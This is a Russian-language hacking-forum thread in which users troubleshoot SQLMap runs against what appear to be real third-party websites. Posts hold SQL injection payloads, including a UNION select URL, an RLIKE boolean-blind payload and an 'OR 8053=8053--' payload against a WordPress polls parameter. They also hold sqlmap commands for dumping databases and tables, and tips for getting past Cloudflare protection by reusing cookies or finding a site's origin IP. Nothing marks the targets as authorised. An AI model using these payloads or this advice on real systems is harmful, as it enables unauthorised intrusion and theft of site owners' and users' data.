Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. ApTemkA

    ApTemkA New Member

    Joined:
    4 Mar 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Получил данную уязвимость
    [​IMG]
    там оказалась одна БД, не считая information_schema, получил таблицы, с первой таблицы сделал дамп, всё ок, пробую другие и везде одно и то же:
    Code:
    [15:13:21] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
    [15:13:22] [WARNING] unable to retrieve the entries of columns 'name' for table 'Test' in database 'm12540_pc'
     
  2. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    71
    Likes Received:
    3
    Reputations:
    0
    как такое может быть, что руками работает самый примитивный запрос
    HTML:
    site.com/view.php?cid=1+union+select+1,2,3,4,5,6
    , a sqlmap не видит в упор, даже если я ему подсовываю тип базы, кол-во столбиков для Union и левелриски? Подскажите, есть ли мысли..
     
  3. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,248
    Reputations:
    148
    --headers="X-Requested-With: XMLHttpRequest" не?
     
  4. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    71
    Likes Received:
    3
    Reputations:
    0
    Спасибо за предложение, но, что бы оно ни значило, результата это не дало, к сожалению.
     
  5. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,248
    Reputations:
    148
    всё успешно отработало с данными параметрами

    --random-agent --dbms=mysql --technique=u
     
    ShpillyWilly likes this.
  6. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    В чём проблема не выводит BD
    Code:
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: address (GET)
        Type: boolean-based blind
        Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
        Payload: address=if' RLIKE (SELECT (CASE WHEN (1726=1726) THEN 0x6966 ELSE 0x28 END)) AND 'yDAP'='yDAP
    ---
    [10:58:47] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
    [10:58:47] [INFO] testing MySQL
    [10:58:47] [INFO] confirming MySQL
    [10:58:47] [INFO] the back-end DBMS is MySQL
    web application technology: Apache, PHP 7.1.11
    back-end DBMS: MySQL >= 5.0.0
    [10:58:47] [INFO] fetching database names
    [10:58:47] [INFO] fetching number of databases
    [10:58:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [10:58:47] [INFO] retrieved:
    [10:58:48] [WARNING] unexpected HTTP code '404' detected. Will use (extra) validation step in similar cases
    
    [10:58:48] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [10:58:48] [ERROR] unable to retrieve the number of databases
    [10:58:48] [INFO] falling back to current database
    [10:58:48] [INFO] fetching current database
    [10:58:48] [INFO] retrieved:
    [10:58:49] [CRITICAL] unable to retrieve the database names
    [10:58:49] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 6 times
     
  7. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,248
    Reputations:
    148
    Вообще

    [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

    как бы намекает...
    В твоём случае --no-cast
     
  8. akv84

    akv84 New Member

    Joined:
    14 May 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Добрый день,

    Не могу получить дамп к нужной таблицы в SQLite:
    команда: sqlmap -r request.txt -p Param --dbms=sqlite --force-ssl -D SQLite_db -T USERDB --dump
    На выходе получаем:
    [INFO] retrieved: CREATE TABLE USERDB ( OID
    [WARNING] unable to enumerate the columns for table 'USERDB' in database 'SQLite_db'

    Некоторые таблицы получаю без проблем в этой же базе.
     
  9. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Может есть смысл не всю таблицу дампить, а определенные колонки например
     
    akv84 likes this.
  10. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    в sqlite нет баз данных, там только таблицы, -D SQLite_db точно не нужно
     
    _________________________
    BabaDook, erwerr2321 and akv84 like this.
  11. akv84

    akv84 New Member

    Joined:
    14 May 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Колонки не выводит, все тоже самое: "unable to enumerate the columns"

    Спасибо!
     
  12. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Точно, точно. Не думал что sql крутит sqlite
     
  13. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Подскажите есть решение траблы с клаудом? как я понимаю не крутится из-за него

    [12:11:45] [WARNING] potential browser verification protection mechanism detected (CloudFlare)
    [12:11:45] [WARNING] the web server responded with an HTTP error code (503) which could interfere with the results of the tests
     
  14. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    попробуй вручную пройти верификацию в браузере, cloudflare присвоит тебе куки, затем передай эти куки в sqlmap
     
  15. ekaterina333

    ekaterina333 Banned

    Joined:
    11 Oct 2013
    Messages:
    12
    Likes Received:
    3
    Reputations:
    0
    не поможет думаю там в другом проблема
     
  16. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    71
    Likes Received:
    3
    Reputations:
    0
    попробуй узнать реальный ip и его уже дергать. https://forum.antichat.ru/threads/realnyj-ip-za-cloud-flare-sokrytie-i-poisk.458593/
     
  17. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
  18. Golfstream

    Golfstream New Member

    Joined:
    16 Mar 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    [22:12:44] [WARNING] the web server responded with an HTTP error code (424) whic
    h could interfere with the results of the tests
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: vote (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: wp-polls-nonce=08fc675d54&vote=-6688) OR 8053=8053-- GHAp&poll_3=8&
    poll_3=9&poll_3=10&archive-dropdown=http://*****.**/2014/05/&poll_id=3
    ---
    [22:12:44] [INFO] the back-end DBMS is Microsoft SQL Server
    back-end DBMS: Microsoft SQL Server 2016
    [22:12:44] [INFO] fetching database names
    [22:12:44] [INFO] fetching number of databases
    [22:12:46] [INFO] retrieved:
    [22:12:46] [ERROR] unable to retrieve the number of databases
    [22:12:46] [INFO] retrieving the length of query output
    [22:12:46] [INFO] retrieved:
    [22:12:47] [INFO] retrieved:
    [22:12:47] [INFO] falling back to current database
    [22:12:47] [INFO] fetching current database
    [22:12:47] [INFO] retrieving the length of query output
    [22:12:47] [INFO] retrieved:
    [22:12:48] [INFO] retrieved:
    [22:12:48] [CRITICAL] unable to retrieve the database names
    [22:12:48] [WARNING] HTTP error codes detected during run:
    424 (?) - 24 times

    подскажите дальнейшие действия, может команды какойто не хватает? блокируется бд. Тамперы юзал, но толка нет
     
    #598 Golfstream, 27 Jan 2018
    Last edited: 27 Jan 2018
  19. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    86
    Likes Received:
    69
    Reputations:
    3
    Включи -v 3 и --parse-errors, там смотри откуда ноги растут. Еще попробуй --no-cast или --hex, иногда прокатывает. Зачарить пробуй.
     
  20. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Нашёл слепую SQL injection на сайте но она в профиле аккаунта
    Как мне прикрутить сесию или типа того ?